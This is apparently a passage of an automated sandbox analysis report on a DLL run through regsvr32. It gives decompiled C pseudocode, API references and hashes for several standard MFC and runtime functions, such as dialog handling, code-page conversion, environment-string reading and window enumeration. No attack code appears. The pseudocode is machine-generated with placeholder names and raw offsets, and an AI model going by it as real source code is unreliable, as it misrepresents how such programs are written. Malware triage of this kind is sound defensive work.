C-Code - Quality: 92%

			E1001F2BB(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E10011A8C(E1002A80E, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E10027747();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E10027747() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E1001EDFB(_t85);
					E10020B34();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E10021D7F();
					_t49 = E10020A8C(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E1001F0AE(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E100229FB(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E10020530(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E10022C1F(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E1001EE35(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}

0x1001f2c0
0x1001f2ca
0x1001f2cf
0x1001f2d3
0x1001f2d6
0x1001f2d9
0x1001f2dc
0x1001f2e5
0x1001f2e8
0x1001f2ef
0x1001f300
0x1001f306
0x1001f306
0x1001f30d
0x1001f312
0x1001f318
0x1001f318
0x1001f31c
0x1001f32d
0x1001f330
0x1001f335
0x1001f339
0x1001f33d
0x1001f33f
0x1001f345
0x1001f348
0x1001f34d
0x1001f353
0x1001f355
0x1001f35c
0x1001f362
0x1001f362
0x1001f355
0x1001f348
0x1001f369
0x1001f36d
0x1001f36e
0x1001f376
0x1001f37b
0x1001f37c
0x1001f37d
0x1001f380
0x1001f387
0x1001f389
0x1001f38b
0x1001f38f
0x1001f393
0x1001f396
0x1001f39b
0x1001f39e
0x1001f3a2
0x1001f3a2
0x1001f3a6
0x1001f3a6
0x1001f3ab
0x1001f3ae
0x1001f3bc
0x1001f3bc
0x1001f3ae
0x1001f3dd
0x1001f3e1
0x1001f3e4
0x1001f3eb
0x1001f3eb
0x1001f3f1
0x1001f3f4
0x1001f3fc
0x1001f3ff
0x1001f404
0x1001f404
0x1001f3ff
0x1001f40e
0x1001f413
0x1001f418
0x1001f41b
0x1001f420
0x1001f420
0x1001f426
0x1001f31e
0x1001f31e
0x1001f31e
0x1001f42e
0x1001f437

APIs

__EH_prolog.LIBCMT ref: 1001F2C0
FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F2F8
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1001F300

Part of subcall function 10020B34: UnhookWindowsHookEx.USER32(?), ref: 10020B59

LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 1001F312
GetDesktopWindow.USER32 ref: 1001F33F
IsWindowEnabled.USER32(00000000), ref: 1001F34D
EnableWindow.USER32(00000000,00000000), ref: 1001F35C
EnableWindow.USER32(00000000,00000001), ref: 1001F3EB
GetActiveWindow.USER32 ref: 1001F3F6
SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F404
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F420

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 833315621-0
Opcode ID: 1f84151ef9ef92f50fe4379972704eab08b992c14362451c0c9a4ea825c6b16d
Instruction ID: 329a2a791b226240712562ebed41b0d0f7aebcabf2785b484657ceb6e67ce66d
Opcode Fuzzy Hash: 1f84151ef9ef92f50fe4379972704eab08b992c14362451c0c9a4ea825c6b16d
Instruction Fuzzy Hash: CA419E34900B15DBDB11DFA4D8897BEBBF5FF14711F60002DF112A62A1CBB4AE86CA61

Uniqueness

Uniqueness Score: -1.00%

Function 10019AF7 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10019AF7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				int _t96;
				void* _t98;
				short* _t99;

				_push(0x38);
				_push(0x1002f7e0);
				E10012CE0(__ebx, __edi, __esi);
				_t54 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t98 - 0x1c)) = _t54;
				 *(_t98 - 0x34) = 0;
				 *(_t98 - 0x44) = 0;
				_t81 =  *( *(_t98 + 0x14));
				 *(_t98 - 0x40) = _t81;
				 *(_t98 - 0x3c) = 0;
				_t56 =  *(_t98 + 8);
				if(_t56 ==  *(_t98 + 0xc)) {
					_t82 =  *(_t98 - 0x48);
					goto L31;
				} else {
					_t85 = _t98 - 0x30;
					if(GetCPInfo(_t56, _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1 && GetCPInfo( *(_t98 + 0xc), _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1) {
						 *(_t98 - 0x3c) = 1;
					}
					if( *(_t98 - 0x3c) == 0) {
						_t96 =  *(_t98 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10012000( *(_t98 + 0x10));
							_pop(_t85);
							_t96 = _t77 + 1;
							__eflags = _t96;
						} else {
							_t96 = _t81;
						}
						 *(_t98 - 0x38) = _t96;
					}
					if( *(_t98 - 0x3c) != 0) {
						L14:
						 *(_t98 - 4) = 0;
						E100116D0(_t96 + _t96 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t98 - 0x18) = _t99;
						_t82 = _t99;
						 *(_t98 - 0x48) = _t82;
						E10012400(_t82, 0, _t96 + _t96);
						 *(_t98 - 4) =  *(_t98 - 4) | 0xffffffff;
						_t112 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10),  *(_t98 - 0x40), _t82, _t96);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t98 - 0x44);
								if( *(_t98 - 0x44) != 0) {
									_push(_t82);
									E1001111B();
								}
								_t57 =  *(_t98 - 0x34);
								goto L34;
							}
							__eflags =  *(_t98 + 0x18);
							if( *(_t98 + 0x18) == 0) {
								__eflags =  *(_t98 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t96);
									_push(1);
									_t69 = E10013955(_t82, 0, _t96, __eflags);
									 *(_t98 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, _t69, _t96, 0, 0);
										__eflags = _t70;
										if(_t70 != 0) {
											__eflags =  *(_t98 - 0x40) - 0xffffffff;
											if( *(_t98 - 0x40) != 0xffffffff) {
												 *( *(_t98 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t98 - 0x34));
											E1001111B();
											 *(_t98 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t96 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, 0, 0, 0, 0);
								__eflags = _t96;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96,  *(_t98 + 0x18),  *(_t98 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t98 - 0x34) =  *(_t98 + 0x18);
							}
							goto L31;
						} else {
							_push(_t96);
							_push(2);
							_t82 = E10013955(_t82, 0, _t96, _t112);
							if(_t82 != 0) {
								 *(_t98 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t96 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10), _t81, 0, 0);
						 *(_t98 - 0x38) = _t96;
						if(_t96 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E10012D1B(E10011A49(_t57,  *((intOrPtr*)(_t98 - 0x1c))));
						}
						goto L14;
					}
				}
			}

0x10019af7
0x10019af9
0x10019afe
0x10019b03
0x10019b08
0x10019b0d
0x10019b10
0x10019b16
0x10019b18
0x10019b1b
0x10019b1e
0x10019b24
0x10019c9d
0x00000000
0x10019b2a
0x10019b2a
0x10019b39
0x10019b54
0x10019b54
0x10019b5e
0x10019b7a
0x10019b60
0x10019b63
0x10019b6c
0x10019b71
0x10019b74
0x10019b74
0x10019b65
0x10019b65
0x10019b65
0x10019b75
0x10019b75
0x10019b80
0x10019b9c
0x10019b9c
0x10019ba8
0x10019bad
0x10019bb0
0x10019bb2
0x10019bbb
0x10019bc3
0x10019be0
0x10019be2
0x10019c02
0x10019c0f
0x10019c15
0x10019c17
0x10019ca0
0x10019ca0
0x10019ca3
0x10019ca5
0x10019ca6
0x10019cab
0x10019cac
0x00000000
0x10019cac
0x10019c1d
0x10019c20
0x10019c42
0x10019c45
0x10019c5d
0x10019c5d
0x10019c5e
0x10019c60
0x10019c67
0x10019c6a
0x10019c6c
0x10019c78
0x10019c7e
0x10019c80
0x10019c90
0x10019c94
0x10019c99
0x10019c99
0x10019c82
0x10019c82
0x10019c85
0x10019c8b
0x10019c8b
0x10019c80
0x00000000
0x10019c6c
0x10019c57
0x10019c59
0x10019c5b
0x00000000
0x00000000
0x00000000
0x10019c5b
0x10019c30
0x10019c36
0x10019c38
0x10019c3d
0x10019c3d
0x00000000
0x10019be4
0x10019be4
0x10019be5
0x10019bee
0x10019bf2
0x10019bfb
0x00000000
0x10019bfb
0x00000000
0x10019bf2
0x10019b82
0x10019b93
0x10019b95
0x10019b9a
0x10019bf4
0x10019bf4
0x10019caf
0x10019cbf
0x10019cbf
0x00000000
0x10019b9a
0x10019b80

APIs

GetCPInfo.KERNEL32(00000000,?,1002F7E0,00000038,100187A5,?,00000000,00000000,100129C0,00000000,00000000,1002F210,0000001C,100126EF,00000001,00000020), ref: 10019B35
GetCPInfo.KERNEL32(00000000,00000001), ref: 10019B48
_strlen.LIBCMT ref: 10019B6C
MultiByteToWideChar.KERNEL32(00000000,00000001,100129C0,?,00000000,00000000), ref: 10019B8D

Strings

@hvpYv, xrefs: 10019C30, 10019C51, 10019C78

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Info$ByteCharMultiWide_strlen
String ID: @hvpYv
API String ID: 1335377746-2766943729
Opcode ID: bfd56e426d39671fa2e1d78d2a0964afa57495d4f276f40384039733b7fe3f2d
Instruction ID: 294774cc866d07f8cfe9786a50fecf10184bee5b6bc6581c56cb6a99e577165d
Opcode Fuzzy Hash: bfd56e426d39671fa2e1d78d2a0964afa57495d4f276f40384039733b7fe3f2d
Instruction Fuzzy Hash: 65516C71900219EBDF21CFA5EDC5D9EBBF9EF85790F20021AF854AA150D7319D91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10016C53 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E10016C53() {
				int _v4;
				int _v8;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1003a4a8; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					if(_t7 != 1) {
						if(_t7 == _t38 || _t7 == _t29) {
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							if(_t37 == _t29) {
								goto L20;
							}
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E10011233(_t8 - _t37 + 1);
								if(_t34 != _t29) {
									E10011CC0(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
							} while ( *_t8 != _t29);
							goto L25;
						} else {
							L20:
							return 0;
						}
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E10011233(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									if(WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29) == 0) {
										_push(_v8);
										E1001111B();
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					if(GetLastError() != 0x78) {
						_t7 =  *0x1003a4a8; // 0x1
					} else {
						_t7 = _t38;
						 *0x1003a4a8 = _t7;
					}
					goto L6;
				} else {
					 *0x1003a4a8 = 1;
					goto L7;
				}
			}

0x10016c55
0x10016c64
0x10016c66
0x10016c6c
0x10016c6d
0x10016c9c
0x10016c9f
0x10016d20
0x10016d2a
0x10016d30
0x10016d34
0x00000000
0x00000000
0x10016d38
0x10016d44
0x10016d47
0x10016d4f
0x10016d54
0x10016d5d
0x10016d56
0x10016d56
0x10016d56
0x10016d66
0x00000000
0x00000000
0x00000000
0x00000000
0x10016d3a
0x10016d3a
0x10016d3a
0x10016d3a
0x10016d3b
0x10016d3f
0x10016d40
0x00000000
0x10016d26
0x10016d26
0x00000000
0x10016d26
0x10016d20
0x10016ca1
0x10016ca3
0x10016cad
0x10016cb0
0x10016cb2
0x10016cc2
0x10016cd0
0x10016cd5
0x10016cdb
0x10016cdf
0x10016ce2
0x10016cea
0x10016cee
0x10016cff
0x10016d01
0x10016d05
0x10016d0b
0x10016d0b
0x10016d0f
0x10016d0f
0x10016cee
0x10016d14
0x00000000
0x00000000
0x00000000
0x00000000
0x10016cb4
0x10016cb4
0x10016cb4
0x10016cb4
0x10016cb6
0x10016cbb
0x10016cbd
0x00000000
0x10016cb4
0x10016ca7
0x10016cab
0x00000000
0x00000000
0x00000000
0x10016cab
0x10016c71
0x10016c75
0x10016c8c
0x10016c97
0x10016c8e
0x10016c8e
0x10016c90
0x10016c90
0x00000000
0x10016c77
0x10016c77
0x00000000
0x10016c77

APIs

GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016C6F
GetLastError.KERNEL32(?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016C83
GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016CA5
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,100117D6), ref: 10016CD9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100117D6,?,?), ref: 10016CFB
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016D14
GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016D2A
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10016D66

Strings

@hvpYv, xrefs: 10016CC2

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
String ID: @hvpYv
API String ID: 883850110-2766943729
Opcode ID: 9995ca29ea17e4230e41c8290f683c66e812ba8dc88be33dde8572edb321261e
Instruction ID: 926af3bb7882c21ced6ecf110d92c77dad54a8330243c493b836114948af40df
Opcode Fuzzy Hash: 9995ca29ea17e4230e41c8290f683c66e812ba8dc88be33dde8572edb321261e
Instruction Fuzzy Hash: 9E31DB72E092666FD710EF749CC482FBADCEB4D2D47220829F985CB111E571DCC582B1

Uniqueness

Uniqueness Score: -1.00%

Function 10006B40 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006B40(long __ecx) {
				long _t73;

				_t73 = __ecx;
				E10005C40(__ecx);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				_t71 = __ecx + 0x9b0;
				E1001D3F5(__ecx + 0x9b0,  *((intOrPtr*)(__ecx + 0x70)), "Title", 0, 0x8c, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(__ecx + 0x9b0,  *((intOrPtr*)(__ecx + 0x70)), "Handle", 2, 0x32, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(__ecx + 0x9b0,  *((intOrPtr*)(__ecx + 0x70)), "Visible", 2, 0x3c, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(_t71,  *((intOrPtr*)(__ecx + 0x70)), "Class Name", 0, 0x78, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(_t71,  *((intOrPtr*)(__ecx + 0x70)), "Position", 0, 0x50, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(_t71,  *((intOrPtr*)(__ecx + 0x70)), "Size", 0, 0x50, 0xffffffff);
				E10022AD3(__ecx + 0x870, 5);
				E10022AD3(__ecx + 0x820, 5);
				E10022AD3(__ecx + 0x780, 5);
				E10022AD3(__ecx + 0x7d0, 5);
				E10022AD3(__ecx + 0x960, 0);
				E10022AD3(__ecx + 0x8c0, 0);
				SendMessageA( *(__ecx + 0x9cc), 0x1009, 0, 0);
				EnumWindows(E10006560, _t73);
				return SendMessageA( *(_t73 + 0x9cc), 0x1030, 0, 0);
			}

0x10006b42
0x10006b44
0x10006b5d
0x10006b60
0x10006b69
0x10006b82
0x10006b85
0x10006b9b
0x10006ba1
0x10006bba
0x10006bbd
0x10006bd3
0x10006bd9
0x10006bf2
0x10006bf5
0x10006c02
0x10006c0f
0x10006c1c
0x10006c29
0x10006c36
0x10006c43
0x10006c5e
0x10006c66
0x10006c80

APIs

Part of subcall function 10005C40: SendMessageA.USER32 ref: 10005C5B
Part of subcall function 10005C40: SendMessageA.USER32 ref: 10005C76

Part of subcall function 1001D3F5: SendMessageA.USER32 ref: 1001D43E

Part of subcall function 10022AD3: ShowWindow.USER32(?,?,1000EAF7,00000000,?,?), ref: 10022AE0

SendMessageA.USER32 ref: 10006C5E
EnumWindows.USER32(Function_00006560), ref: 10006C66
SendMessageA.USER32 ref: 10006C7C

Strings

Title, xrefs: 10006B58
Size, xrefs: 10006BE7
Handle, xrefs: 10006B77
Class Name, xrefs: 10006BAF
Position, xrefs: 10006BCE
Visible, xrefs: 10006B96

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$EnumShowWindowWindows
String ID: Class Name$Handle$Position$Size$Title$Visible
API String ID: 2835337212-1044999955
Opcode ID: 234e9427408f03d077dc5a09339208828af23a2054dd4e41a140069fdd4963f0
Instruction ID: 5b3f4c06643dc47a5fad6414e9e2523a50f5fe302b23b9255f75891dd828c4ce
Opcode Fuzzy Hash: 234e9427408f03d077dc5a09339208828af23a2054dd4e41a140069fdd4963f0
Instruction Fuzzy Hash: 0D313C35A44B00ABE224EB74DC4AFA7B2E5FB84710F54460DB366AE5E1CFB0B5058B52

Uniqueness

Uniqueness Score: -1.00%

Function 10021A08 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E10021A08(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t59;
				void* _t62;
				void* _t67;
				struct HWND__* _t69;
				CHAR* _t72;
				void* _t75;
				void* _t76;
				void* _t78;

				_t67 = __edx;
				_t62 = __ecx;
				E10011A8C(E1002A947, _t76);
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t78 - 0x40;
				_t72 = "AfxOldWndProc423";
				_t33 = GetPropA(_t69, _t72);
				 *(_t76 - 0x14) =  *(_t76 - 0x14) & 0x00000000;
				 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
				 *(_t76 - 0x18) = _t33;
				_t59 = 1;
				_t35 =  *(_t76 + 0xc) - 6;
				if(_t35 == 0) {
					_t36 = E10020A8C(_t76,  *(_t76 + 0x14));
					E10021931(_t62, E10020A8C(_t76, _t69),  *(_t76 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t59 = 0 | E10021992(E10020A8C(_t76, _t69),  *(_t76 + 0x14),  *(_t76 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t69, 0xfffffffc,  *(_t76 - 0x18));
							RemovePropA(_t69, _t72);
							GlobalDeleteAtom(GlobalFindAtomA(_t72));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t76 - 0x14) = CallWindowProcA( *(_t76 - 0x18), _t69,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14));
							} else {
								_t75 = E10020A8C(_t76, _t69);
								E100200C8(_t75, _t76 - 0x30, _t76 - 0x1c);
								_t54 = CallWindowProcA( *(_t76 - 0x18), _t69, 0x110,  *(_t76 + 0x10),  *(_t76 + 0x14));
								_push( *((intOrPtr*)(_t76 - 0x1c)));
								 *(_t76 - 0x14) = _t54;
								_push(_t76 - 0x30);
								_push(_t75);
								E10020FD8(_t67);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return  *(_t76 - 0x14);
			}

0x10021a08
0x10021a08
0x10021a0d
0x10021a18
0x10021a1b
0x10021a1e
0x10021a25
0x10021a2b
0x10021a2f
0x10021a33
0x10021a3b
0x10021a3c
0x10021a3f
0x10021af5
0x10021b07
0x00000000
0x10021a45
0x10021a45
0x10021a48
0x10021aed
0x10021b0c
0x10021b0e
0x00000000
0x00000000
0x10021a4e
0x10021a4e
0x10021a51
0x10021ab3
0x10021abb
0x10021ac9
0x00000000
0x10021a53
0x10021a58
0x10021b10
0x10021b23
0x10021a5e
0x10021a64
0x10021a6f
0x10021a83
0x10021a89
0x10021a8c
0x10021a92
0x10021a93
0x10021a94
0x10021a94
0x10021a58
0x10021a51
0x10021a48
0x10021aa1
0x10021aaa

APIs

__EH_prolog.LIBCMT ref: 10021A0D
GetPropA.USER32 ref: 10021A25
CallWindowProcA.USER32 ref: 10021A83

Part of subcall function 10020FD8: GetWindowRect.USER32 ref: 10020FFD
Part of subcall function 10020FD8: GetWindow.USER32(?,00000004), ref: 1002101A

SetWindowLongA.USER32(?,000000FC,?), ref: 10021AB3
RemovePropA.USER32 ref: 10021ABB
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 10021AC2
GlobalDeleteAtom.KERNEL32(00000000), ref: 10021AC9

Part of subcall function 100200C8: GetWindowRect.USER32 ref: 100200D4

CallWindowProcA.USER32 ref: 10021B1D

Strings

AfxOldWndProc423, xrefs: 10021A1E, 10021A23, 10021AB9, 10021AC1

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: 5b6e10a8791aa71462b777079064f57030f775fcf92d7cd70ed55ef028a2e836
Instruction ID: f4db88134fa4fcd45b9ca341be74c52e6f6026fe64d5eaacddb05769ed1f3ebd
Opcode Fuzzy Hash: 5b6e10a8791aa71462b777079064f57030f775fcf92d7cd70ed55ef028a2e836
